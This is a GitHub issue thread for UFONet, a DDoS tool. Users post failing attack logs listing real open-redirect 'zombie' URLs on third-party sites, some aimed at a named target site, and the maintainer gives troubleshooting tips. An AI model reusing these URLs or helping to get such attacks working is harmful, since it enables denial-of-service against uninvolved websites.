### ISSUE TITLE
CANNOT CONNECT error

### ISSUE THREAD

**Issue by CrimsonTorso** [epsylon/ufonet#155]
When I attack a website, I always get an error from my zombies:
URL: -> FAILED (cannot connect!)
and it never works. Mind helping?

**Comment by trollmad3** [comment]
What version are you running? + can you add `-v` to your command and post the results here?

**Comment by CrimsonTorso** [comment]
Sure

**Comment by CrimsonTorso** [comment]
Here's some results. I'm using Python3.
``r.com/news/gta/article/1264293--openfile-news-website-suspends-publishing-ahead-of-pretty-big-change&amp;sa=U&amp;ved=0ahUKEwjmp7S076rMAhVD6xoKHZ6XA00QFgjWATAi&amp;usg=AFQjCNFuhQarx5FnSDV91RBCR880xvz7Ywopenfile=https://www.tommywiseau.com
[Info] [Zombies] http://www.oceanaresidences.com/keybiscayne/wp-content/themes/oceana/floorplans/large/4-12thfloor/01S.php?url=http://www.oceanaresidences.com/keybiscayne/wp-content/themes/oceanas.php?url= -> FAILED (cannot connect!)
 [Info] [Zombies] http://www.aidsalliance.org.ua/cgi-bin/index.cgi?url= -> FAILED (cannot connect!)
 [Info] [Zombies] Payload:[Info] [Zombies] Payload:  http://www.marosa.net/gallery/gallery.php?id=https://www.tommywiseau.com
http://play.americangirl.com/play/books/advice/book.php?bookid=CareKeepingBook.php?bookID=https://www.tommywiseau.com
[Info] [Zombies] http://www.autoadmit.com/go.php?url= -> FAILED (cannot connect!)
[Info] [Zombies] Payload: http://ec2-50-17-240-22.compute-1.amazonaws.com/blog/go.php?url=https://www.tommywiseau.com
[Info] [AI] [Zombies] http://www.dedbit.com/redir.php?url= -> REPLY (HTTP Code: 0 | Time: 1.510204 | Size: 0)
[Info] [AI] [Zombies] http://content.dynamicmessenger.com/cornerstone/?0DjcXFrxPxxF1rAmlZQQabHNGyFLO7Hl0&http://www.thestar.com/news/gta/article/1264293--openfile-news-website-suspends-publishing-ahead-of-pretty-big-change&amp;sa=U&amp;ved=0ahUKEwjmp7S076rMAhVD6xoKHZ6XA00QFgjWATAi&amp;usg=AFQjCNFuhQarx5FnSDV91RBCR880xvz7Ywopenfile= -> REPLY (HTTP Code: 0 | Time: 1.510144 | Size: 0)
[Info] [AI] [Zombies] http://www.marosa.net/gallery/gallery.php?id= -> REPLY (HTTP Code: 0 | Time: 1.50948 | Size: 0)
[Info] [AI] [Zombies] http://play.americangirl.com/play/books/advice/book.php?bookid=CareKeepingBook.php?bookID= -> REPLY (HTTP Code: 0 | Time: 1.51094 | Size: 0)
[Info] [AI] [Zombies] http://ec2-50-17-240-22.compute-1.amazonaws.com/blog/go.php?url= -> REPLY (HTTP Code: 0 | Time: 1.510102 | Size: 0)
``

**Comment by trollmad3** [comment]
There is no HTTP status code 0. What you see is a 0 returned by the API/library that you are using

**Comment by ShadowWoIf** [comment]
Kinda Same situation here. Here's an example.

[Info] [Zombies] Attacking from: addons.silverstripe.org
[Info] [Zombies] http://addons.silverstripe.org/add-ons/cyberduck/referer-tracker&amp;sa=U&amp;ved=0ahUKEwjgsdqZj7nKAhVF62MKHb9SC84QFgjfAjA5&amp;usg=AFQjCNF3xlQvi_jXAoilaWv3vj88Zua5ewreferer= -> FAILED (cannot connect!)

[Error] [AI] Something wrong attacking!

[Info] [Zombies] http://omahkain.com/search/AngularJS+and+Google+OAuth2+redirect_uri+++Stack+Overflow/&amp;sa=U&amp;ved=0ahUKEwjk7uuWj7nKAhUBWmMKHQUgB4gQFgjvAzBZ&amp;usg=AFQjCNFm4wl8QKlRRvvJnCVZL2pCcHEuRwredirect_uri= -> FAILED (cannot connect!)
Segmentation fault

So what went wrong? Why didn't the attach happen??

**Comment by ShadowWoIf** [comment]
> There is no HTTP status code 0. What you see is a 0 returned by the API/library that you are using

Also I did not understand this reply. Sorry I'm pretty new to linux systems. Could you care to explain?

**Comment by ShadowWoIf** [comment]
The following command to check the zombies don't seem to work as well
./ufonet -t botnet/zombies.txt 
which results
Are 'they' alive? :-) (HEAD Check):
===================================
Trying: 742
---------------------

[Error] [AI] Something wrong testing!

**Comment by ShadowWoIf** [comment]
The following command to check the zombies don't seem to work as well

./ufonet -t botnet/zombies.txt   which results

Are 'they' alive? :-) (HEAD Check):
===================================
Trying: 742
---------------------

[Error] [AI] Something wrong testing!

**Comment by epsylon** [comment]
Hi
You should review your connection. If you are using a proxy for example TOR, probably isn't working as expected. On the other hand, UFONet only works on Python2.7.x. Please try to run it using supported versions.

**Comment by datta438** [comment]
Does this attack work on https websites

**Comment by Aholicknight** [comment]
@datta438 Quit commenting on old posts.

**Comment by epsylon** [comment]
@datta438 yep
